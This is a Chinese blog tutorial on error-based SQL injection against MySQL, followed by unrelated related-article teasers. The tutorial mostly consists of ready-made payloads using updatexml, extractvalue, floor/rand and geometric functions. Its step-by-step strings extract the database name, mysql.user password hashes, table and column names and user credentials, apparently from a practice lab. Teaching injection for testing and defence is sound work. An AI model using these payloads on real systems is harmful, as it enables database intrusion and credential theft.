当前位置：首页 > news >正文

【网络安全】SQL注入--报错注入

news 2025/7/10 4:25:23

报错注入

- 报错注入定义
- 代码展示
- 常用的报错语句
- - 1.获取数据库名称
  - 2.获取mysql账号密码
  - 3.获取表名
  - 4.获取字段名
  - 5.获取账号密码

报错注入定义

报错注入：利用sql语句的不规范，获取相关sql提示信息

代码展示

在这里插入图片描述

常用的报错语句

select first_name, last_name FROM users where user_id = ‘1’ and info() –
#获取当前使用的库
1’ and (updatexml(1,concat(0x7e,(select user()),0x7e),1)) – 或version() 、database()
#获取数据库敏感信息
1.floor()
select * from test where id=1 and (select 1 from (select
count(),concat(user(),floor(rand(0)2))x from information_schema.tables group by
x)a);
2.extractvalue()
select * from test where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)));
3.updatexml()
select * from test where id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1));
4.geometrycollection()
select * from test where id=1 and geometrycollection((select * from(select *
from(select user())a)b));
5.multipoint()
select * from test where id=1 and multipoint((select * from(select * from(select
user())a)b));
6.polygon()
select * from test where id=1 and polygon((select * from(select * from(select
user())a)b));
7.multipolygon()
select * from test where id=1 and multipolygon((select * from(select * from(select
user())a)b));
8.linestring()
select * from test where id=1 and linestring((select * from(select * from(select
user())a)b));
9.multilinestring()
select * from test where id=1 and multilinestring((select * from(select * from(select
user())a)b));
10.exp()
select * from test where id=1 and exp(~(select * from(select user())a));

1.获取数据库名称

1' and info() --

在这里插入图片描述

2.获取mysql账号密码

1' and updatexml(1,concat(0x7e,(select (select authentication_string from mysql.user limit 1 )),0x7e),1) -- 
1' and updatexml(1,concat(0x7e,(select (substring((select authentication_string from mysql.user limit 1),32,40))),0x7e),1) --

因为一条只能显示32字符，所以两段拼接则为mysql密码
在这里插入图片描述

3.获取表名

1'and (select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) --

在这里插入图片描述

4.获取字段名

1'and (select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,column_name,0x7e) FROM information_schema.columns where table_name='users' LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) --

在这里插入图片描述
借助burpsuite

在这里插入图片描述

5.获取账号密码

1' and (select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x23,user,0x3a,password,0x23) FROM users limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) --

在这里插入图片描述

【网络安全】SQL注入--报错注入

报错注入报错注入定义代码展示常用的报错语句1.获取数据库名称2.获取mysql账号密码3.获取表名4.获取字段名5.获取账号密码报错注入定义报错注入：利用sql语句的不规范，获取相关sql提示信息代码展示常用的报错语句 select first_name, last_name FROM…...

编程日记 2023/5/17 22:22:52

APP隐私整改建议

1、违规收集个人信息情形一： APP首次启动时，未有以弹窗形式明示个人信息保护政策。改进建议： APP首次启动时，以弹窗等形式向用户明示个人信息保护政策。情形二： 个人信息保护政策未有说明个人信息处理的目的、方…...

编程日记 2023/5/11 15:51:58

MySQL数据模型 and 通用语法 and 分类

关系型数据库关系型数据库是由多张能互相连接的二维表组成的数据库。优点： 1.都是使用表结构，格式一致，易于维护。 2.使用通用的SQL语言操作，使用方便，可用于复杂查询。 3.数据存储在磁盘中，安全。 …...

编程日记 2023/5/26 20:47:11

一款识别域名是否使用cdn的工具cdnChecker

cdnChecker 一款识别域名是否使用cdn的工具 https://github.com/alwaystest18/cdnChecker 背景红队打点时经常会有收集子域名然后转成ip进而扩展ip段进行脆弱点寻找的需求，如果域名使用cdn，会导致收集错误的ip段，因此我们需要排除cdn来收…...

编程日记 2023/5/11 15:53:30

Ant Design Vue的汉化 1. 引入依赖 import zhCN from "ant-design-vue/lib/locale-provider/zh_CN"; // 汉化 export default {data () {zhCN,} }2. 标签包裹需要汉化的组件 <a-config-provider :locale"zhCN"><a-table :row-selection"ro…...

编程日记 2023/5/24 2:12:21

spring cloud中实现接口广播请求到服务提供者

一、背景假如现在有一台服务A，两台服务B，可以简化为如下图模型： 需求：一次请求服务A需要同时将请求广播打到两台服务B上。二、实现方案 2.1 需要应用到两个类： 2.1.1：LoadBalancerClient package org…...

编程日记 2023/5/24 21:34:51

电机PID参数调节笔记

规则1 1）降低比例增益P，可以获得较小的振动2）有可能不需要调节I环和D环3）提升比例增益P环可以增加灵敏度，但可能会出现不稳定的情况（如振动）4）可以设定电机速度最大幅值&#xff0c…...

编程日记 2023/5/24 21:35:58

【深度学习】基于华为MindSpore的手写体图像识别实验

1 实验介绍 1.1 简介 Mnist手写体图像识别实验是深度学习入门经典实验。Mnist数据集包含60,000个用于训练的示例和10,000个用于测试的示例。这些数字已经过尺寸标准化并位于图像中心，图像是固定大小(28x28像素)，其值为0到255。为简单起见，每…...

编程日记 2023/5/11 15:54:31

Linux：内核调试之内核魔术键sysrq

在linux系统下，我们可能会遇到系统某个命令hang住的情况，通常情况下，我们会查看/proc/pid/wchan文件，看看进程处于什么状况，然后进一步查看系统日志或者使用strace跟踪命令执行时的系统调用等等方法来分析问题。我们知…...

编程日记 2023/5/28 1:04:44

Python import导包快速入门

import 和 from import 在 Python 中，使用 import 语句可以将其他 Python 模块或包中的代码引入到当前模块中，以供使用。通常情况下，我们可以使用以下语法将整个模块导入到当前命名空间中： import module_name其中，m…...

编程日记 2023/5/24 13:10:40

ChatGPT这么火，我们能怎么办？

今天打开百度，看到这样一条热搜高居榜二：B站UP主发起停更潮，然后点进去了解一看，大体是因为最近AI创作太火，对高质量原创形成了巨大冲击！记得之前看过一位UP主的分享，说B站UP主的年收入大体约等…...

编程日记 2023/5/12 11:32:25

HashMap底层原理

文章目录1. 基本概念2. HashMap 的底层数据结构3. HashMap 的 put 方法流程4. 怎么计算节点存储的下标5. Hash 冲突1）概念2）解决 hash 冲突的办法开放地址法再哈希法链地址法建立公共溢出区6. HashMap 的扩容机制1）扩容时涉及到的几个属性2&a…...

编程日记 2023/5/15 12:02:39

卡顿优化小结

卡顿的本质卡顿的本质是因为一次垂直同步信号来的时候，当前帧要显示的图像数据还没准备好，只能等待16ms下一次垂直同步信号来时才能更新画面，在这段时间里显示器只能一直停留在上一帧的画面，如果跳过的帧数过多，就会…...

编程日记 2023/5/28 19:31:28

springboot前端ajax 04 关于后台传的时间和状态在前端的转换

修改状态及时间格式在jsp中，时间显式： 只需要把json的时间部分改为用Date对象来显示就好了。 <td>new Date(jsonObj[i].startTime).toLocaleString()</td> <td>new Date(jsonObj[i].endTime).toLocaleString()</td> 状态对象…...

编程日记 2023/5/25 6:57:45

解决Windows微信和 PowerToys 的键盘管理器冲突

Windows开机之后PowerToys能正常使用, 但是打开微信之后设置好的快捷键映射就全部失效了打开微信 -> 左下角三条杠 -> 设置 -> 快捷键首先我把微信的快捷键全部清空了,发现还是没用然后发现了设置里默认勾选了检测快捷键,我在想程序肯定是一直在后台检测,而powerTo…...

编程日记 2023/4/11 7:16:41

组会时间的工作

1. 党支部活动看看组织生活记录本写完了没有 2. 论文翻译...

编程日记 2023/5/23 3:09:01

linux udp bind 返回值-1分析

在linux socket通信中，我们通常用到open/bind/read/write等内部函数，那么当这些函数返回值为-1的时候，我们怎么进一步定位呢！（1）怎么打印出返回值出错的原因呢！系统调用的错误都会存放在errno中 errno需要的头文件： #include<errno.h> strerror头文件,将错误信…...

编程日记 2023/5/25 16:48:47

Hexo搭建博客

文章目录开始安装使用配置主题配置gitee配置域名之前配置过hexo但是后来hexo文件夹莫名其妙崩了，我也懒得修理，就没管了，现在又想重拾回来。然后hexo可以搭建静态博客网站，放在github或者gitee都行，有免费的网页空间&a…...

编程日记 2023/5/12 3:19:01

Lesson11:http协议

前言应用层:就是程序员基于socket接口之上编写的具体逻辑,做了很多工作,都是和文本处理有关的--- 协议分析与处理http协议,一定会具有大量的文体分析和协议处理如果用户想再url中包含url本身用来作为特殊字符的字符,url形式的时候,浏览器会自动给我们进行编码encode一般服务端…...

编程日记 2023/5/15 12:41:28

计算机信息安全有哪些SCI期刊推荐？ - 易智编译EaseEditing

以下是计算机信息安全方向的SCI期刊推荐： IEEE Transactions on Information Forensics and Security 该期刊主要发表信息安全和数字取证方面的原创性研究，包括数据安全、网络安全、身份认证、加密、信息隐藏等领域的研究成果。该期刊的影响因子为8.134…...

编程日记 2023/5/15 12:43:24

逻辑回归：给不确定性划界的分类大师

想象你是一名医生。面对患者的检查报告（肿瘤大小、血液指标），你需要做出一个**决定性判断**：恶性还是良性？这种“非黑即白”的抉择，正是**逻辑回归（Logistic Regression）** 的战场&a…...

编程新知 2025/6/20 12:22:50

Auto-Coder使用GPT-4o完成：在用TabPFN这个模型构建一个预测未来3天涨跌的分类任务

通过akshare库，获取股票数据，并生成TabPFN这个模型可以识别、处理的格式，写一个完整的预处理示例，并构建一个预测未来 3 天股价涨跌的分类任务用TabPFN这个模型构建一个预测未来 3 天股价涨跌的分类任务，进行预测并输…...

编程新知 2025/6/26 20:21:28

spring：实例工厂方法获取bean

spring处理使用静态工厂方法获取bean实例，也可以通过实例工厂方法获取bean实例。实例工厂方法步骤如下： 定义实例工厂类（Java代码），定义实例工厂（xml），定义调用实例工厂&#xff…...

编程新知 2025/7/7 20:02:31

OpenPrompt 和直接对提示词的嵌入向量进行训练有什么区别

OpenPrompt 和直接对提示词的嵌入向量进行训练有什么区别直接训练提示词嵌入向量的核心区别您提到的代码： prompt_embedding = initial_embedding.clone().requires_grad_(True) optimizer = torch.optim.Adam([prompt_embedding...

编程新知 2025/7/4 0:50:01

Unsafe Fileupload篇补充-木马的详细教程与木马分享（中国蚁剑方式）

在之前的皮卡丘靶场第九期Unsafe Fileupload篇中我们学习了木马的原理并且学了一个简单的木马文件本期内容是为了更好的为大家解释木马（服务器方面的）的原理，连接，以及各种木马及连接工具的分享文件木马：https://w…...

编程新知 2025/7/8 17:32:32

HDFS分布式存储 zookeeper

hadoop介绍狭义上hadoop是指apache的一款开源软件用java语言实现开源框架，允许使用简单的变成模型跨计算机对大型集群进行分布式处理（1.海量的数据存储 2.海量数据的计算）Hadoop核心组件 hdfs（分布式文件存储系统）&a…...

编程新知 2025/7/7 5:44:33

面向无人机海岸带生态系统监测的语义分割基准数据集

描述：海岸带生态系统的监测是维护生态平衡和可持续发展的重要任务。语义分割技术在遥感影像中的应用为海岸带生态系统的精准监测提供了有效手段。然而，目前该领域仍面临一个挑战，即缺乏公开的专门面向海岸带生态系统的语义分割基准数据集。受…...

编程新知 2025/7/8 7:50:08

Linux 下 DMA 内存映射浅析

序系统 I/O 设备驱动程序通常调用其特定子系统的接口为 DMA 分配内存，但最终会调到 DMA 子系统的dma_alloc_coherent()/dma_alloc_attrs() 等接口。关于 dma_alloc_coherent 接口详细的代码讲解、调用流程，可以参考这篇文章，我觉得写的非常…...

编程新知 2025/7/8 21:51:53